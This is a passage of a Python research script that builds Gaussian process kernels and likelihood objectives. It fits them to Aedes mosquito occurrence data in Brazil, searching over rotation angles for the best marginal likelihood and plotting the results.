sigma_matern: coefficient factor at the front\n :param length_matern: length scale\n :param x1: First set of coordinates for iteration\n :param x2: Second set of coordinates for iteration\n :return: Covariance matrix with matern kernel\n \"\"\"\n # To allow the function to take in x1 and x2 of various dimensions\n if np.array([x1.shape]).size == 1 and np.array([x2.shape]).size != 1 and x1.size == x2.shape[0]:\n rows = 1\n columns = x2.shape[1]\n elif np.array([x2.shape]).size == 1 and np.array([x1.shape]).size != 1 and x2.size == x1.shape[0]:\n rows = x1.shape[1]\n columns = 1\n elif np.array([x1.shape]).size == 1 and np.array([x2.shape]).size == 1 and x1.size == x2.size:\n rows = 1\n columns = 1\n else:\n rows = x1.shape[1]\n columns = x2.shape[1]\n\n c = np.zeros((rows, columns))\n\n if v_value == 1/2:\n for i in range(c.shape[0]):\n for j in range(c.shape[1]):\n if np.array([x1.shape]).size == 1 and np.array([x2.shape]).size != 1:\n diff = x1 - x2[:, j]\n elif np.array([x1.shape]).size != 1 and np.array([x2.shape]).size == 1:\n diff = x1[:, i] - x2\n elif np.array([x1.shape]).size == 1 and np.array([x2.shape]).size == 1:\n diff = x1 - x2\n else:\n diff = x1[:, i] - x2[:, j]\n\n euclidean = np.sqrt(np.matmul(diff, np.transpose(diff)))\n exp_term = np.exp(-1 * euclidean * (length_matern ** -1))\n c[i, j] = (sigma_matern ** 2) * exp_term\n\n if v_value == 3/2:\n for i in range(c.shape[0]):\n for j in range(c.shape[1]):\n if np.array([x1.shape]).size == 1 and np.array([x2.shape]).size != 1:\n diff = x1 - x2[:, j]\n elif np.array([x1.shape]).size != 1 and np.array([x2.shape]).size == 1:\n diff = x1[:, i] - x2\n elif np.array([x1.shape]).size == 1 and np.array([x2.shape]).size == 1:\n diff = x1 - x2\n else:\n diff = x1[:, i] - x2[:, j]\n\n euclidean = np.sqrt(np.matmul(diff, np.transpose(diff)))\n coefficient_term = (1 + np.sqrt(3) * euclidean * (length_matern ** -1))\n exp_term = np.exp(-1 * np.sqrt(3) * euclidean * (length_matern ** -1))\n c[i, j] = (sigma_matern ** 2) * coefficient_term * exp_term\n return c\n\n\n# This is way faster than the function above beyond n=10\ndef fast_matern_2d(sigma_matern, length_matern, x1, x2): # there are only two variables in the matern function\n \"\"\"\n This is much much faster than iteration over every point beyond n = 10. This function takes advantage of the\n symmetry in the covariance matrix and allows for fast regeneration. For this function, v = 3/2\n :param sigma_matern: coefficient factor at the front\n :param length_matern: length scale\n :param x1: First set of coordinates for iteration\n :param x2: Second set of coordinates for iteration\n :return: Covariance matrix with matern kernel\n \"\"\"\n # Note that this function only takes in 2-D coordinates, make sure there are 2 rows and n columns\n n = x1.shape[1]\n cov_matrix = np.zeros((n, n))\n for i in range(n):\n cov_matrix[i, i] = sigma_matern ** 2\n for j in range(i + 1, n):\n diff = x1[:, i] - x2[:, j]\n euclidean = np.sqrt(np.matmul(diff, np.transpose(diff)))\n coefficient_term = (1 + np.sqrt(3) * euclidean * (length_matern ** -1))\n exp_term = np.exp(-1 * np.sqrt(3) * euclidean * (length_matern ** -1))\n cov_matrix[i, j] = (sigma_matern ** 2) * coefficient_term * exp_term\n cov_matrix[j, i] = cov_matrix[i, j]\n\n return cov_matrix\n\n\ndef fast_matern_1_2d(sigma_matern, length_matern, x1, x2):\n \"\"\"\n Much faster method of obtaining the Matern v=1/2 covariance matrix by exploiting the symmetry of the\n covariance matrix. 
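The kernel here is\n    k(r) = sigma_matern**2 * exp(-r / length_matern), i.e. the exponential\n    (Ornstein-Uhlenbeck) covariance. 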
This is the once-differentiable (zero mean squared differentiable) matern\n :param sigma_matern: Coefficient at the front\n :param length_matern: Length scale\n :param x1: First set of coordinates for iteration\n :param x2: Second set of coordinates for iteration\n :return: Covariance matrix with matern kernel\n \"\"\"\n # Note that this function only takes in 2-D coordinates, make sure there are 2 rows and n columns\n n = x1.shape[1]\n cov_matrix = np.zeros((n, n))\n for i in range(n):\n cov_matrix[i, i] = sigma_matern ** 2\n for j in range(i + 1, n):\n diff = x1[:, i] - x2[:, j]\n euclidean = np.sqrt(np.matmul(diff, np.transpose(diff)))\n exp_term = np.exp(-1 * euclidean * (length_matern ** -1))\n cov_matrix[i, j] = (sigma_matern ** 2) * exp_term\n cov_matrix[j, i] = cov_matrix[i, j]\n\n return cov_matrix\n\n\ndef fast_squared_exp_2d(sigma_exp, length_exp, x1, x2): # there are only two variables in the matern function\n \"\"\"\n This is much much faster than iteration over every point beyond n = 10. This function takes advantage of the\n symmetry in the covariance matrix and allows for fast regeneration.\n :param sigma_exp: coefficient factor at the front\n :param length_exp: length scale\n :param x1: First set of coordinates for iteration\n :param x2: Second set of coordinates for iteration\n :return: Covariance matrix with squared exponential kernel - indicating infinite differentiability\n \"\"\"\n # Note that this function only takes in 2-D coordinates, make sure there are 2 rows and n columns\n n = x1.shape[1]\n cov_matrix = np.zeros((n, n))\n for i in range(n):\n cov_matrix[i, i] = sigma_exp ** 2\n for j in range(i + 1, n):\n diff = x1[:, i] - x2[:, j]\n euclidean = np.sqrt(np.matmul(diff, np.transpose(diff)))\n exp_power = np.exp(-1 * (euclidean ** 2) * (length_exp ** -2))\n cov_matrix[i, j] = (sigma_exp ** 2) * exp_power\n cov_matrix[j, i] = cov_matrix[i, j]\n\n return cov_matrix\n\n\ndef fast_rational_quadratic_2d(alpha_rq, length_rq, x1, x2):\n \"\"\"\n Rational Quadratic Coveriance function with 2 parameters to be optimized, using\n power alpha and length scale l. The Rational Quadratic Kernel is used to model the\n volatility of equity index returns, which is equivalent to a sum of Squared\n Exponential Kernels. This kernel is used to model multi-scale data\n\n This is a fast method of generating the rational quadratic kernel, by exploiting the symmetry\n of the covariance matrix\n :param alpha_rq: power and denominator\n :param length_rq: length scale\n :param x1: First set of coordinates for iteration\n :param x2: Second set of coordinates for iteration\n :return: Covariance matrix with Rational Quadratic Kernel\n \"\"\"\n # Note that this function only takes in 2-D coordinates, make sure there are 2 rows and n columns\n n = x1.shape[1]\n covariance_matrix = np.zeros((n, n))\n for i in range(n):\n covariance_matrix[i, i] = 1\n for j in range(i + 1, n):\n diff = x1[:, i] - x2[:, j]\n euclidean_squared = np.matmul(diff, np.transpose(diff))\n fraction_term = euclidean_squared / (2 * alpha_rq * (length_rq ** 2))\n covariance_matrix[i, j] = (1 + fraction_term) ** (-1 * alpha_rq)\n covariance_matrix[j, i] = covariance_matrix[i, j]\n\n return covariance_matrix\n\n\ndef log_model_evidence(param, *args):\n \"\"\"\n ***NOTE THIS IS FOR STANDARD GP REGRESSION - DO NOT USE FOR LGCP. THIS FUNCTION ASSUMES THAT THE LATENT INTENSITY IS\n THE SAME AS THE DATA SET. 
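The log-evidence whose negative is returned is\n    log p(y|X) = -0.5*(y - mu)^T K^-1 (y - mu) - 0.5*log|K| - (n/2)*log(2*pi), with\n    K = C + noise**2 * I. 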
HENCE, OVER HERE, WE TAKE (y_i - u_i) instead of (v_i - u_i) as the difference for the\n calculation of the euclidean\n\n :param param: sigma, length scale and noise hyper-parameters\n :param args: inputs into the function (from dataset and elsewhere)\n :return: The log-Model evidence\n \"\"\"\n sigma = param[0]\n length = param[1]\n noise = param[2] # Over here we have defined each parameter in the tuple, include noise\n scalar_mean = param[3]\n xy_coordinates = args[0] # This argument is a constant passed into the function\n histogram_data = args[1] # Have to enter histogram data as well\n prior_mu = mean_func_scalar(scalar_mean, xy_coordinates) # This creates a matrix with 2 rows\n c_auto = fast_matern_2d(sigma, length, xy_coordinates, xy_coordinates)\n # c_auto = squared_exp_2d(sigma, length, xy_coordinates, xy_coordinates)\n c_noise = np.eye(c_auto.shape[0]) * (noise ** 2) # Fro-necker delta function\n c_auto_noise = c_auto + c_noise # Overall including noise, plus include any other combination\n model_fit = - 0.5 * fn.matmulmul(histogram_data - prior_mu, np.linalg.inv(c_auto_noise),\n np.transpose(histogram_data - prior_mu))\n model_complexity = - 0.5 * (math.log(np.linalg.det(c_auto_noise)))\n model_constant = - 0.5 * len(histogram_data) * math.log(2*np.pi)\n log_model_evid = model_fit + model_complexity + model_constant\n return -log_model_evid # We want to maximize the log-likelihood, meaning the min of negative log-likelihood\n\n\ndef log_integrand_without_v(param, *args):\n \"\"\"\n 1. Tabulates the log of the integrand, g(v), so that we can optimise for v_array and hyper-parameters\n The log of the integrand, log[g(v)] is used as log function is monotonically increasing - so they have the same\n optimal points - note we want to maximize the integrand\n 2. Note here that because the LGCP model is doubly stochastic, the log-intensities are meant to be optimized]\n 3. Kernel: Matern(3/2)\n :param param: v_array, hyperparameters - sigma, length scale and noise, prior scalar mean\n :param args: xy coordinates for iteration, data set k_array, matern factor value = 1/2 or 3/2\n :return: the log of the integrand, log[g(v)], so that we can optimise and find best hyperparameters and vhap\n \"\"\"\n # Generate Matern Covariance Matrix\n # Enter parameters\n sigma = param[0]\n length = param[1]\n noise = param[2]\n scalar_mean = param[3]\n v_array = param[4:] # Concatenate v_array behind the hyper-parameters\n\n # Enter Arguments\n xy_coordinates = args[0]\n k_array = args[1]\n prior_mean = mean_func_scalar(scalar_mean, xy_coordinates)\n c_auto = fast_matern_2d(sigma, length, xy_coordinates, xy_coordinates)\n c_noise = np.eye(c_auto.shape[0]) * (noise ** 2) # Fro-necker delta function\n cov_matrix = c_auto + c_noise\n\n \"\"\"Generate Objective Function = log[g(v)]\"\"\"\n exp_term = -1 * np.sum(np.exp(v_array))\n product_term = np.matmul(v_array, np.transpose(k_array))\n det_term = -0.5 * np.log(2 * np.pi * np.linalg.det(cov_matrix))\n\n factorial_k = scispec.gamma(k_array + 1)\n factorial_term = - np.sum(np.log(factorial_k))\n\n v_difference = v_array - prior_mean\n euclidean_term = -0.5 * fn.matmulmul(v_difference, np.linalg.inv(cov_matrix), np.transpose(v_difference))\n\n \"\"\"Summation of all terms change to correct form to find minimum point\"\"\"\n log_g = exp_term + product_term + det_term + factorial_term + euclidean_term\n log_g_minimization = -1 * log_g\n return log_g_minimization\n\n\ndef log_integrand_with_v(param, *args):\n \"\"\"\n 1. 
Tabulates the log of the integrand, g(v), so that we can optimise for the GP hyper-parameters given\n having optimised for the v_array. The v_array will now be entered as an argument into the objective function.\n The log of the integrand, log[g(v)] is used as log function is monotonically increasing - so they have the same\n optimal points - note we want to maximize the integrand\n\n 2. Note here that because the LGCP model is doubly stochastic, the log-intensities are meant to be optimized]\n\n 3. Kernel: Matern(3/2)\n :param param: v_array, hyperparameters - sigma, length scale and noise, prior scalar mean\n :param args: xy coordinates for iteration, data set k_array, matern factor value = 1/2 or 3/2\n :return: the log of the integrand, log[g(v)], so that we can optimise and find best hyperparameters and vhap\n\n *** Note that this objective function is currently problematic - advised to not use it ***\n \"\"\"\n # Generate Matern Covariance Matrix\n # Enter parameters\n sigma = param[0]\n length = param[1]\n noise = param[2]\n scalar_mean = param[3]\n\n # Enter Arguments\n xy_coordinates = args[0]\n k_array = args[1]\n v_array = args[2] # Note that this is refers to the optimised log-intensity array\n prior_mean = mean_func_scalar(scalar_mean, xy_coordinates)\n c_auto = fast_matern_2d(sigma, length, xy_coordinates, xy_coordinates)\n c_noise = np.eye(c_auto.shape[0]) * (noise ** 2) # Fro-necker delta function\n cov_matrix = c_auto + c_noise\n\n \"\"\"Generate Objective Function = log[g(v)]\"\"\"\n exp_term = -1 * np.sum(np.exp(v_array))\n product_term = v_array * k_array\n det_term = -0.5 * np.log(2 * np.pi * np.linalg.det(cov_matrix))\n\n factorial_k = scispec.gamma(k_array + 1)\n factorial_term = - np.sum(np.log(factorial_k))\n\n v_difference = v_array - prior_mean\n euclidean_term = -0.5 * fn.matmulmul(v_difference, np.linalg.inv(cov_matrix), np.transpose(v_difference))\n\n \"\"\"Summation of all terms change to correct form to find minimum point\"\"\"\n log_g = exp_term + product_term + det_term + factorial_term + euclidean_term\n log_g_minimization = -1 * log_g\n return log_g_minimization\n\n\ndef short_log_integrand_v(param, *args):\n \"\"\"\n 1. Shorter version that tabulates only the log of the GP prior behind the Poisson distribution. Includes only terms\n containing the covariance matrix elements that are made up of the kernel hyper-parameters\n 2. Kernel: Matern 3/2, Matern 1/2, Squared Exponential and Rational Quadratic Kernels\n 3. 
Assume a constant latent intensity, even at locations without any incidences\n    :param param: hyperparameters - sigma, length scale and noise, prior scalar mean - array of 4 elements\n    :param args: xy coordinates for input into the covariance function and the optimised v_array\n    :return: the log of the GP Prior, log[N(prior mean, covariance matrix)]\n    \"\"\"\n    # Generate Matern Covariance Matrix\n    # Enter parameters\n    sigma = param[0]\n    length = param[1]\n    noise = param[2]\n    scalar_mean = param[3]\n\n    # Enter Arguments\n    xy_coordinates = args[0]\n    v_array = args[1]  # Note that this refers to the optimised log-intensity array\n    kernel_choice = args[2]\n\n    # The Covariance Matrix and Prior mean are created here as a component of the objective function\n    prior_mean = mean_func_scalar(scalar_mean, xy_coordinates)\n\n    # Select Kernel and Construct Covariance Matrix\n    if kernel_choice == 'matern3':\n        c_auto = fast_matern_2d(sigma, length, xy_coordinates, xy_coordinates)\n    elif kernel_choice == 'matern1':\n        c_auto = fast_matern_1_2d(sigma, length, xy_coordinates, xy_coordinates)\n    elif kernel_choice == 'squared_exponential':\n        c_auto = fast_squared_exp_2d(sigma, length, xy_coordinates, xy_coordinates)\n    elif kernel_choice == 'rational_quad':\n        c_auto = fast_rational_quadratic_2d(sigma, length, xy_coordinates, xy_coordinates)\n    else:\n        c_auto = fast_matern_2d(sigma, length, xy_coordinates, xy_coordinates)\n\n    c_noise = np.eye(c_auto.shape[0]) * (noise ** 2)  # Kronecker delta (i.i.d. noise on the diagonal)\n    cov_matrix = c_auto + c_noise\n\n    \"\"\"Generate Objective Function = log[g(v)]\"\"\"\n\n    # Generate Determinant Term (after taking log) - use slogdet directly to avoid overflow in the determinant\n    log_det = np.linalg.slogdet(cov_matrix)[1]\n    det_term = -0.5 * (np.log(2 * np.pi) + log_det)\n\n    # Generate Euclidean Term (after taking log)\n    v_difference = v_array - prior_mean\n    inv_covariance_matrix = np.linalg.inv(cov_matrix)\n    euclidean_term = -0.5 * fn.matmulmul(v_difference, inv_covariance_matrix, np.transpose(v_difference))\n\n    \"\"\"Summation of all terms change to correct form to find minimum point\"\"\"\n    log_gp = det_term + euclidean_term\n    log_gp_minimization = -1 * log_gp  # Make the function convex for minimization\n    return log_gp_minimization\n\n\ndef log_poisson_likelihood_opt(param, *args):\n    \"\"\"\n    Considers only the log-likelihood of the Poisson distribution in front of the Gaussian process to optimize\n    latent values - note that there are no hyper-parameters here to consider. 
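The objective below is\n    log p(k | v) = sum_i ( -exp(v_i) + k_i*v_i - log(k_i!) ). 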
The log-likelihood is used because\n    the natural log is monotonically increasing\n    :param param: v_array containing the latent intensities\n    :param args: k_array which is the data set\n    :return: log of the combined Poisson distributions\n    \"\"\"\n    # Define parameters and arguments\n    v_array = param\n    k_array = args[0]\n\n    # Generate Objective Function: log(P(D|v))\n    exp_term = -1 * np.sum(np.exp(v_array))\n    product_term = np.matmul(v_array, np.transpose(k_array))\n\n    factorial_k = scispec.gamma(k_array + np.ones_like(k_array))\n    # factorial_term = - np.sum(np.log(factorial_k))  # summation of logs = log of product\n    factorial_term = - np.sum(fn.log_special(factorial_k))  # summation of logs = log of product\n\n    log_p_likelihood = exp_term + product_term + factorial_term\n    log_p_likelihood_convex = -1 * log_p_likelihood\n    return log_p_likelihood_convex\n\n\ndef gradient_log_likelihood(param, *args):\n    \"\"\"\n    Construct gradient vector of the log-likelihood for optimization\n    :param param: v_array (log of the latent intensities)\n    :param args: k_array (the data set)\n    :return: gradient vector of size n\n    \"\"\"\n    # Define parameters and arguments\n    v_array = param\n    k_array = args[0]\n\n    # Construct Gradient Vector\n    exp_component = -1 * np.exp(v_array)\n    k_component = k_array\n    grad_vector = exp_component + k_component\n    grad_vector_convex = -1 * grad_vector\n    return grad_vector_convex\n\n\ndef hessianproduct_log_likelihood(param, *args):\n    \"\"\"\n    Generates vector containing the hessian product along each variable direction\n    :param param: v_array containing the latent intensities\n    :param args: tuple containing (k_array, p_array) - note this tuple is passed into every function/derivative in the\n    optimization\n    :return: vector containing the hessian product, which is the hessian matrix multiplied by an arbitrary vector p\n    \"\"\"\n    # Define parameters and arguments\n    v_array = param\n    p_array = args[1]\n    # Generate Hessian Product without creating the hessian\n    exp_v_array = np.exp(v_array)\n    hessian_product = -1 * exp_v_array * p_array\n    hessian_product_convex = -1 * hessian_product\n    return hessian_product_convex\n\n\ndef short_log_integrand_data(param, *args):\n    \"\"\"\n    1. Shorter version that tabulates only the log of the GP prior. Includes only terms\n    containing the covariance matrix elements that are made up of the kernel hyper-parameters\n    2. Kernel: Matern(3/2), Matern(1/2), Squared Exponential\n    3. 
Assume a constant latent intensity, even at locations without any incidences\n    :param param: hyperparameters - sigma, length scale and noise, prior scalar mean - array of 4 elements\n    :param args: xy coordinates for input into the covariance function and the histogram\n    :return: the log of the GP Prior, log[N(prior mean, covariance matrix)]\n    \"\"\"\n    # Generate Matern Covariance Matrix\n    # Enter parameters\n    sigma = param[0]\n    length = param[1]\n    noise = param[2]\n    scalar_mean = param[3]\n\n    # Enter Arguments - entered as a tuple\n    xy_coordinates = args[0]\n    data_array = args[1]  # Note that this refers to the histogram counts used as regression targets\n    kernel = args[2]\n\n    # Set up inputs for generation of objective function\n    p_mean = mean_func_scalar(scalar_mean, xy_coordinates)\n\n    # Change_Param - change kernel by setting cases\n    if kernel == 'matern3':\n        c_auto = fast_matern_2d(sigma, length, xy_coordinates, xy_coordinates)\n    elif kernel == 'matern1':\n        c_auto = fast_matern_1_2d(sigma, length, xy_coordinates, xy_coordinates)\n    elif kernel == 'squared_exponential':\n        c_auto = fast_squared_exp_2d(sigma, length, xy_coordinates, xy_coordinates)\n    elif kernel == 'rational_quad':\n        c_auto = fast_rational_quadratic_2d(sigma, length, xy_coordinates, xy_coordinates)\n    else:  # Unrecognised kernel string: fall back to an identity covariance and warn\n        c_auto = np.eye(data_array.size)\n        print('Check for Appropriate Kernel')\n\n    c_noise = np.eye(c_auto.shape[0]) * (noise ** 2)  # Kronecker delta (i.i.d. noise on the diagonal)\n    cov_matrix = c_auto + c_noise\n\n    \"\"\"Generate Objective Function = log[g(v)]\"\"\"\n    # Generate Determinant Term (after taking log) - use slogdet directly to avoid overflow in the determinant\n    log_det = np.linalg.slogdet(cov_matrix)[1]\n    det_term = -0.5 * (np.log(2 * np.pi) + log_det)\n\n    # Generate Euclidean Term (after taking log)\n    data_diff = data_array - p_mean\n    inv_covariance_matrix = np.linalg.inv(cov_matrix)\n    euclidean_term = -0.5 * fn.matmulmul(data_diff, inv_covariance_matrix, data_diff)\n\n    \"\"\"Summation of all terms change to correct form to find minimum point\"\"\"\n    log_gp = det_term + euclidean_term\n    log_gp_minimization = -1 * log_gp  # Make the function convex for minimization\n    return log_gp_minimization\n\n\ndef rotation_likelihood_opt(param, *args):\n    \"\"\"\n    Objective is to find the angle of rotation that gives the greatest log-likelihood, based on a\n    standard GP regression. It is a reasonable assumption that the same optimal angle will be obtained using both\n    standard GP regression and the LGCP. 
Over here, we do not need to tabulate the posterior so that saves time.\n\n    We are taking the xy_data which is already boxed and a single year will be taken\n\n    :param param: angle of rotation in degrees - note there is only one parameter to optimize\n    :param args: xy_data, center, kernel form (this is a tuple), regression window\n    :return: log marginal likelihood based on the standard GP process\n    \"\"\"\n    angle = param\n\n    # convert angle to radians\n    radians = (angle / 180) * np.pi\n\n    # Unpack Param Tuple\n    center = args[0]\n    kernel = args[1]\n    n_quads = args[2]\n    xy_coordinates = args[3]  # Make this a tuple, so it will be a tuple within a tuple\n    regression_window = args[4]  # This is an array - x_upper, x_lower, y_upper and y_lower\n\n    # Define regression window\n    x_upper_box = regression_window[0]\n    x_lower_box = regression_window[1]\n    y_upper_box = regression_window[2]\n    y_lower_box = regression_window[3]\n\n    # Break up xy_coordinates into x and y\n    x_coordinates = xy_coordinates[0]\n    y_coordinates = xy_coordinates[1]\n\n    # Define Boolean Variable for Scatter Points Selection\n    x_range_box = (x_coordinates > x_lower_box) & (x_coordinates < x_upper_box)\n    y_range_box = (y_coordinates > y_lower_box) & (y_coordinates < y_upper_box)\n\n    # Obtain data points within the regression window\n    x_coordinates = x_coordinates[x_range_box & y_range_box]\n    y_coordinates = y_coordinates[x_range_box & y_range_box]\n\n    # Stack x and y coordinates\n    xy_within_box = np.vstack((x_coordinates, y_coordinates))\n\n    # Rotate about the center with the 2x2 rotation matrix (kept as a 2x2 array:\n    # flattening it with np.hstack would break the matrix product below)\n    rotation_mat = np.array([[np.cos(radians), - np.sin(radians)], [np.sin(radians), np.cos(radians)]])\n    x_within_box = xy_within_box[0] - center[0]\n    y_within_box = xy_within_box[1] - center[1]\n    xy_within_box = np.vstack((x_within_box, y_within_box))\n    xy_within_box = np.matmul(rotation_mat, xy_within_box)\n    rotated_x = xy_within_box[0] + center[0]\n    rotated_y = xy_within_box[1] + center[1]\n\n    # Create boolean variable\n    x_window_w = (rotated_x > x_lower_box) & (rotated_x < x_upper_box)\n    y_window_w = (rotated_y > y_lower_box) & (rotated_y < y_upper_box)\n    x_window = rotated_x[x_window_w & y_window_w]\n    y_window = rotated_y[x_window_w & y_window_w]\n\n    # Conduct a regression on the rotated data set\n    # ChangeParam\n    histo_f, y_edges_f, x_edges_f = np.histogram2d(y_window, x_window, bins=n_quads)\n    x_mesh_plot_f, y_mesh_plot_f = np.meshgrid(x_edges_f, y_edges_f)  # creating mesh-grid for use\n    x_mesh_f = x_mesh_plot_f[:-1, :-1]  # Removing extra rows and columns due to edges\n    y_mesh_f = y_mesh_plot_f[:-1, :-1]\n    x_quad_f = fn.row_create(x_mesh_f)  # Creating the rows from the mesh\n    y_quad_f = fn.row_create(y_mesh_f)\n\n    # Note that over here, we do not have to consider the alignment of quad centers\n\n    # Stack x and y coordinates together\n    xy_quad = np.vstack((x_quad_f, y_quad_f))\n    # Create histogram array\n    k_quad = fn.row_create(histo_f)\n\n    # Begin tabulating log marginal likelihood after optimizing for kernel hyper-parameters\n\n    initial_hyperparam = np.array([3, 2, 1, 1])  # Note that this initial condition should be close to actual\n    # Set up tuple for arguments\n    args_hyperparam = (xy_quad, k_quad, kernel)\n\n    # Start Optimization Algorithm\n    hyperparam_solution = scopt.minimize(fun=short_log_integrand_data, args=args_hyperparam, x0=initial_hyperparam,\n                                         method='Nelder-Mead',\n                                         options={'xatol': 1, 'fatol': 1, 'disp': True, 'maxfev': 10000})\n\n    # Extract 
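the negative log-likelihood below.\n    # (scopt is scipy.optimize, imported at the top of this module: Nelder-Mead uses\n    # only function values - no gradients - which is robust here at the cost of more\n    # function evaluations.)\n\n    # Extract 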
Log_likelihood value\n neg_log_likelihood = hyperparam_solution.fun # Eventually, we will have to minimize the negative log likelihood\n # Hence, this is actually an optimization nested within another optimization algorithm\n return neg_log_likelihood\n\n\n# ------------------------------------------ Start of Data Collection\n\naedes_df = pd.read_csv('Aedes_PP_Data.csv') # generates dataframe from csv - zika data\n\n# Setting boolean variables required for the data\nbrazil = aedes_df['COUNTRY'] == \"Brazil\"\ntaiwan = aedes_df['COUNTRY'] == \"Taiwan\"\naegyp = aedes_df['VECTOR'] == \"Aedes aegypti\"\nalbop = aedes_df['VECTOR'] == \"Aedes albopictus\"\nyear_2014 = aedes_df['YEAR'] == \"2014\"\nyear_2013 = aedes_df['YEAR'] == \"2013\"\nyear_2012 = aedes_df['YEAR'] == \"2012\"\n\n# Extract data for Brazil and make sure to convert data type to float64\naedes_brazil = aedes_df[brazil] # Extracting Brazil Data\naedes_brazil_2014 = aedes_df[brazil & year_2014]\naedes_brazil_2013 = aedes_df[brazil & year_2013]\naedes_brazil_2012 = aedes_df[brazil & year_2012]\naedes_brazil_2013_2014 = aedes_brazil_2013 & aedes_brazil_2014\nx_2014 = aedes_brazil_2014.values[:, 5].astype('float64')\ny_2014 = aedes_brazil_2014.values[:, 4].astype('float64')\nx_2013 = aedes_brazil_2013.values[:, 5].astype('float64')\ny_2013 = aedes_brazil_2013.values[:, 4].astype('float64')\nx_2013_2014 = aedes_brazil_2013_2014.values[:, 5].astype('float64')\ny_2013_2014 = aedes_brazil_2013_2014.values[:, 4].astype('float64')\n# ------------------------------------------ End of Data Collection\n\n# ------------------------------------------ Start of defining scatter point boundary\n# Define Scatter Point Boundary\nx_upper_box = -35\nx_lower_box = -65\ny_upper_box = 0\ny_lower_box = -30\n\n# Define Boolean Variable for Scatter Points Selection\nx_range_box = (x_2013 > x_lower_box) & (x_2013 < x_upper_box)\ny_range_box = (y_2013 > y_lower_box) & (y_2013 < y_upper_box)\n\nx_points = x_2013[x_range_box & y_range_box]\ny_points = y_2013[x_range_box & y_range_box]\n\n# ------------------------------------------ End of defining scatter point boundary\n\n\n# Define arguments for calculating the Log Marginal Likelihood\n# ChangeParam\nc = np.array([-50, -15])\nradius = 8\nker = 'rational_quad'\nquads_on_side = 10\nxy_points = np.vstack((x_points, y_points)) # This refers to all the points that are being rotated\n# reg_limit = (-43, -63, -2, -22) # x_upper, x_lower, y_upper, y_lower\n# Define regression window which actually remains the same\nx_upper = c[0] + radius\nx_lower = c[0] - radius\ny_upper = c[1] + radius\ny_lower = c[1] - radius\n\n# Starting iteration point for angle\n# ChangeParam\nangle_limit = 90\nangle_step = 0.5\nangle_array = np.arange(0, angle_limit + angle_step, angle_step)\nprint('The angle array is ', angle_array)\n\n# Initialise array to store log_likelihood_values\nlikelihood_array = np.zeros_like(angle_array)\nprint('The Initial likelihood array is ', likelihood_array)\n\nstart_likelihood_tab = time.clock()\n\n# For each angle, re-tabulate the optimal hyper_parameters and calculate the log_likelihood\nfor i in range(angle_array.size):\n # Rotate Data Points that are beyond the regression window\n rotated_xy = fn.rotate_array_iterate(angle_array[i], xy_points, c)\n rotated_x = rotated_xy[0]\n rotated_y = rotated_xy[1]\n\n print('Rotated xy is ', rotated_xy)\n # Define regression limits\n # Create Boolean Variable\n x_window = (rotated_x > x_lower) & (rotated_x < x_upper)\n y_window = (rotated_y > y_lower) & (rotated_y < 
y_upper)\n x_within_window = rotated_x[x_window & y_window]\n y_within_window = rotated_y[x_window & y_window]\n # These are the coordinates of points within the regression window\n\n # Generate Histogram from the coordinates of points above\n histo, y_edges, x_edges = np.histogram2d(y_within_window, x_within_window, bins=quads_on_side)\n x_mesh, y_mesh = np.meshgrid(x_edges, y_edges) # creating mesh-grid for use\n x_mesh = x_mesh[:-1, :-1] # Removing extra rows and columns due to edges\n y_mesh = y_mesh[:-1, :-1]\n x_quad = fn.row_create(x_mesh) # Creating the rows from the mesh\n y_quad = fn.row_create(y_mesh)\n k_quad = fn.row_create(histo)\n xy_quad = np.vstack((x_quad, y_quad))\n\n # Initialise arguments for hyper-parameter optimization\n arguments = (xy_quad, k_quad, ker)\n\n # Initialise kernel hyper-parameters\n initial_hyperparameters = np.array([3, 2, 1, 1])\n\n print('The current angle of rotation is ', angle_array[i])\n # Start optimization\n solution = scopt.minimize(fun=short_log_integrand_data, args=arguments, x0=initial_hyperparameters,\n method='Nelder-Mead',\n options={'xatol': 1, 'fatol': 1, 'disp': True, 'maxfev': 1000})\n # Over here, not really concerned about value of hyper-parameters, just the likelihood\n likelihood_array[i] = -1 * solution.fun # A log likelihood value for each i\n\n\nangle_opt_index = np.argmax(likelihood_array) # This gives the index of the maximum angle\nangle_opt = angle_array[angle_opt_index]\nprint('The Log_likelihood Array is ', likelihood_array)\nprint('The Optimal Angle is ', angle_opt)\n\ntime_likelihood_tab = time.clock() - start_likelihood_tab\nprint('Time taken for Angle Iteration =', time_likelihood_tab)\n\nrotated_xy_within_window = fn.rotate_array_iterate(angle_opt, xy_points, c)\nx_rotated = rotated_xy_within_window[0]\ny_rotated = rotated_xy_within_window[1]\n\n# ------------------------------------------ Compute the Posterior using angle_opt\n# Create Likelihood Array for Plotting\nlikelihood_array_plot = np.hstack((likelihood_array, likelihood_array[1:]))\nangle_array_plot = np.arange(0, (2*angle_limit) + angle_step, angle_step)\n\n\n# Quick plot for log likelihood versus angle in degrees\nfig_likelihood_plot = plt.figure()\nlikelihood_plot = fig_likelihood_plot.add_subplot(111)\nlikelihood_plot.plot(angle_array, likelihood_array, color='black')\nlikelihood_plot.set_title('Plot of Log Marginal Likelihood against Rotation Angle')\nlikelihood_plot.set_xlabel('Rotation Angle in Degrees')\nlikelihood_plot.set_ylabel('Log Marginal Likelihood')\n\n# Quick Plot for 2 periods\nfig_likelihood_plot_2 = plt.figure()\nlikelihood_plot_2 = fig_likelihood_plot_2.add_subplot(111)\nlikelihood_plot_2.plot(angle_array_plot, likelihood_array_plot, color='black')\nlikelihood_plot_2.set_title('Plot of Log Marginal Likelihood against Rotation Angle')\nlikelihood_plot_2.set_xlabel('Rotation Angle in Degrees')\nlikelihood_plot_2.set_ylabel('Log Marginal Likelihood')\n\nplt.show()\n\n# ------------------------------------------ Start of rebuilding based on optimal angle\n\n\n# ChangeParam\n\"\"\"\nfig_brazil_scatter = plt.figure()\nbrazil_scatter = fig_brazil_scatter.add_subplot(111)\n# brazil_scatter.scatter(x_2014, y_2014, marker='.', color='blue', s=0.1)\nbrazil_scatter.scatter(x_2013, y_2013, marker='.', color='black', s=0.3)\n# plt.legend([pp_2014, pp_2013], [\"2014\", \"2013\"])\nbrazil_scatter.set_title('Brazil 2013 Aedes Scatter')\n# brazil_scatter.set_xlim(x_lower, x_upper)\n# brazil_scatter.set_ylim(y_lower, 
